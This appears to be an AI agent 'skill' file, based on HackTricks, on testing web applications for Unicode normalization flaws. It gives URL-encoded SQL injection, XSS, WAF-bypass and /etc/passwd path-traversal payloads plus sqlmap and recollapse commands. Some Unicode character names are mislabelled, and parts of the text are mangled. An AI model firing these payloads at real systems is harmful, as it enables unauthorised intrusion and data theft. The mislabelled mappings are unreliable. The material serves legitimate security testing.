Hacktricks-skills unicode-normalization-pentest
How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MDUnicode Normalization Pentesting
This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities occur when applications normalize Unicode input at different stages of processing, potentially bypassing security filters.
Quick Detection Test
Start with the Kelvin Sign test to detect if normalization is happening:
- Send
(U+0212A) encoded asKELVIN SIGN
to any input field%e2%84%aa - If the application echoes back a plain
, Unicode normalization is being performedK - This indicates potential for normalization-based bypass attacks
Understanding the Vulnerability
How It Works
Applications may normalize Unicode input at different processing stages:
- Before filtering: Normalization happens first, then security filters run
- After filtering: Filters run first, then normalization creates new characters
- Inconsistent normalization: Different parts of the app use different algorithms
The Four Normalization Forms
| Form | Description | Use Case |
|---|---|---|
| NFC | Canonical composition | Most common default |
| NFD | Canonical decomposition | Breaks characters into base + combining |
| NFKC | Compatibility composition | Converts compatibility characters |
| NFKD | Compatibility decomposition | Full compatibility breakdown |
Attack Vectors
1. SQL Injection Filter Bypass
When applications filter dangerous characters but normalize afterward:
Target: Single quote
' (0x27)
- Unicode equivalent:
(FULLWIDTH SINGLE QUOTATION MARK)%ef%bc%87
Payloads:
# Single quote injection %ef%bc%87+or+1=1--+ # With Unicode equivalents for all characters %ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3 # Double quote variant %ef%bc%82+or+1=1--+ # OR operator bypass %ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
Key Unicode Mappings:
' → %ef%bc%87 (FULLWIDTH SINGLE QUOTATION MARK) " → %ef%bc%82 (FULLWIDTH DOUBLE QUOTATION MARK) | → %ef%bd%9c (FULLWIDTH VERTICAL LINE) / → %ef%bc%8f (FULLWIDTH SOLIDUS) - → %ef%b9%a3 (FULLWIDTH HYPHEN-MINUS) = → %e2%81%bc (DOUBLE VERTICAL LINE) 1 → %c2%b9 (SUPERSCRIPT ONE) # → %ef%b9%9f (FULLWIDTH NUMBER SIGN) * → %ef%b9%a1 (FULLWIDTH ASTERISK) o → %e1%b4%bc (OGAM LETTER ONN) r → %e1%b4%bf (OGAM LETTER RRI)
2. XSS Bypass
Use Unicode characters that normalize to script-breaking characters:
Example payloads:
<script>alert(1)</script> %e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E %u226e%3Cscript%3Ealert(1)%3C/script%3E
Special K Polyglot:
%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83 # Normalizes to: Leonishan
3. Regex Fuzzing
When regex validation normalizes input but the actual usage doesn't:
Use recollapse tool:
# Generate variations of input to fuzz backend pip install recollapse recollapse "https://example.com/path"
Test for:
- Open Redirect vulnerabilities
- SSRF through URL validation bypass
- Path traversal through normalized characters
4. Unicode Overflow
Exploit byte overflow to create unexpected ASCII characters:
Example: Characters that overflow to
A (0x41):
→0x4e41A
→0x4f41A
→0x5041A
→0x5141A
Technique: Send multi-byte sequences where the last byte is your target character.
Testing Workflow
Step 1: Reconnaissance
- Identify reflected parameters: Find input fields that echo back to output
- Test Kelvin Sign: Send
and check for%e2%84%aa
in responseK - Check normalization behavior: Compare responses with different Unicode forms
Step 2: Filter Analysis
- Identify blocked characters: Test common dangerous characters (
,'
,"
,<
, etc.)> - Test Unicode equivalents: Replace blocked chars with Unicode variants
- Check normalization timing: Determine if normalization happens before or after filtering
Step 3: Exploitation
- Craft payloads: Use Unicode equivalents for your attack vectors
- Test with sqlmap: Use the Unicode template for automated testing
- Manual verification: Confirm the vulnerability works as expected
Step 4: Verification
- Confirm bypass: Verify the attack succeeds through normalization
- Document findings: Record which Unicode forms work
- Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)
Tools and Resources
sqlmap Unicode Template
# Clone the template git clone https://github.com/carlospolop/sqlmap_to_unicode_template # Use with sqlmap python sqlmap_to_unicode.py -u "http://target.com/page?id=1"
recollapse
# Generate input variations pip install recollapse recollapse "input_string"
Reference Tables
Common Scenarios
WAF Bypass
When WAF filters specific characters but normalizes afterward:
# Original blocked payload ' OR 1=1-- # Unicode bypass %ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
Input Validation Bypass
When validation checks for specific patterns but normalizes before use:
# Blocked: <script> # Bypass: %e2%89%ae%3Cscript%3E
Path Traversal
When path validation is bypassed through Unicode:
# Normal: ../../../etc/passwd # Unicode: %c0%af%c0%af%c0%af%c0%af%c0%af%c0%afetc%c0%afpasswd
Best Practices
- Always test normalization: Include Unicode tests in your standard pentest workflow
- Document normalization behavior: Record which forms the application uses
- Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
- Consider encoding layers: URL encoding + Unicode encoding combinations
- Check for inconsistent normalization: Different parts of the app may normalize differently